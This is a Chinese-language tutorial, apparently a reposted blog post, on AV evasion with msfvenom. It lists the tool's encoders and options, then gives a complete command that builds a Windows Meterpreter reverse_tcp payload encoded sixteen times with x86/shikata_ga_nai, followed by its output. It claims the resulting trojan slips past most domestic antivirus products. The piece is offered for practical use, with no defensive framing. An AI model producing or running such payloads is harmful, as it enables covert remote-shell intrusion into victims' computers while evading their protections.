Msfvenom編碼免殺技術(shù)免殺實(shí)戰(zhàn)

免殺技術(shù)在網(wǎng)絡(luò)滲透的實(shí)戰(zhàn)中十分實(shí)用，本文將介紹使用msfvenom自帶編碼免殺工具進(jìn)行編碼免殺，從而實(shí)現(xiàn)繞過殺毒軟件獲得shell的具體方法。
按照文中所講述的方法制作的木馬載荷可以繞開國內(nèi)所使用的大多數(shù)殺毒軟件，包括但不限于火絨，騰訊，百度，金山，virustotal沙箱查殺率12，簡單但實(shí)用

首先查看 msfveonom中可用的免殺編碼器。

msf6 > msfvenom --list encoders

運(yùn)行結(jié)果：

Framework Encoders [--encoder <value>] ======================================Name Rank Description---- ---- -----------cmd/brace low Bash Brace Expansion Command Encodercmd/echo good Echo Command Encodercmd/generic_sh manual Generic Shell Variable Substitution Command Encodercmd/ifs low Bourne ${IFS} Substitution Command Encodercmd/perl normal Perl Command Encodercmd/powershell_base64 excellent Powershell Base64 Command Encodercmd/printf_php_mq manual printf(1) via PHP magic_quotes UtilityCommand Encodergeneric/eicar manual The EICAR Encodergeneric/none normal The "none" Encodermipsbe/byte_xori normal Byte XORi Encodermipsbe/longxor normal XOR Encodermipsle/byte_xori normal Byte XORi Encodermipsle/longxor normal XOR Encoderphp/base64 great PHP Base64 Encoderppc/longxor normal PPC LongXOR Encoderppc/longxor_tag normal PPC LongXOR Encoderruby/base64 great Ruby Base64 Encodersparc/longxor_tag normal SPARC DWORD XOR Encoderx64/xor normal XOR Encoderx64/xor_context normal Hostname-based Context Keyed Payload Encoderx64/xor_dynamic normal Dynamic key XOR Encoderx64/zutto_dekiru manual Zutto Dekirux86/add_sub manual Add/Sub Encoderx86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoderx86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoderx86/avoid_underscore_to manual Avoid underscore/tolowerlowerx86/avoid_utf8_tolower manual Avoid UTF8/tolowerx86/bloxor manual BloXor - A Metamorphic Block Based XOREncoderx86/bmp_polyglot manual BMP Polyglotx86/call4_dword_xor normal Call+4 Dword XOR Encoderx86/context_cpuid manual CPUID-based Context Keyed Payload Encoderx86/context_stat manual stat(2)-based Context Keyed Payload Encoderx86/context_time manual time(2)-based Context Keyed Payload Encoderx86/countdown normal Single-byte XOR Countdown Encoderx86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOREncoderx86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/opt_sub manual Sub Encoder (optimised)x86/service manual Register Servicex86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoderx86/single_static_bit manual Single Static Bitx86/unicode_mixed manual Alpha2 Alphanumeric Unicode MixedcaseEncoderx86/unicode_upper manual Alpha2 Alphanumeric Unicode UppercaseEncoderx86/xor_dynamic normal Dynamic key XOR Encoder

列表展示了所有可用的編碼器，此處選用x86/shikata_ga_nai舉例
以下是msfvenom的可用參數(shù)：

Options:-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom--list-options List --payload <value>'s standard, advanced and evasion options-f, --format <format> Output format (use --list formats to list)-e, --encoder <encoder> The encoder to use (use --list encoders to list)--service-name <value> The service name to use when generating a service binary--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string--smallest Generate the smallest possible payload using all available encoders--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)--encrypt-key <value> A key to be used for --encrypt--encrypt-iv <value> An initialization vector for --encrypt-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)--platform <platform> The platform for --payload (use --list platforms to list)-o, --out <path> Save the payload to a file-b, --bad-chars <list> Characters to avoid example: '\x00\xff'-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)-s, --space <length> The maximum size of the resulting payload--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)-i, --iterations <count> The number of times to encode the payload-c, --add-code <path> Specify an additional win32 shellcode file to include-x, --template <path> Specify a custom executable file to use as a template-k, --keep Preserve the --template behaviour and inject the payload as a new thread-v, --var-name <value> Specify a custom variable name to use for certain output formats-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)-h, --help Show this message

運(yùn)行如下命令：

msf6 > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.0.103 LPORT=4444 -f raw X > /Users/shikapy.py

運(yùn)行結(jié)果：

Found 1 compatible encoders Attempting to encode payload with 16 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai succeeded with size 408 (iteration=1) x86/shikata_ga_nai succeeded with size 435 (iteration=2) x86/shikata_ga_nai succeeded with size 462 (iteration=3) x86/shikata_ga_nai succeeded with size 489 (iteration=4) x86/shikata_ga_nai succeeded with size 516 (iteration=5) x86/shikata_ga_nai succeeded with size 543 (iteration=6) x86/shikata_ga_nai succeeded with size 570 (iteration=7) x86/shikata_ga_nai succeeded with size 597 (iteration=8) x86/shikata_ga_nai succeeded with size 624 (iteration=9) x86/shikata_ga_nai succeeded with size 651 (iteration=10) x86/shikata_ga_nai succeeded with size 678 (iteration=11) x86/shikata_ga_nai succeeded with size 705 (iteration=12) x86/shikata_ga_nai succeeded with size 732 (iteration=13) x86/shikata_ga_nai succeeded with size 759 (iteration=14) x86/shikata_ga_nai succeeded with size 786 (iteration=15) x86/shikata_ga_nai chosen with final size 786 Payload size: 786 bytes

此時已經(jīng)生成了位于/Users目錄下的shikapy.py的木馬載荷文件

亦可使用模版文件或使用py2exe工具轉(zhuǎn)換成exe提高免殺效果，本文不再贅述
附：VT查殺圖

總結(jié)

以上是生活随笔為你收集整理的Msfvenom编码免杀技术实现免杀实战的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。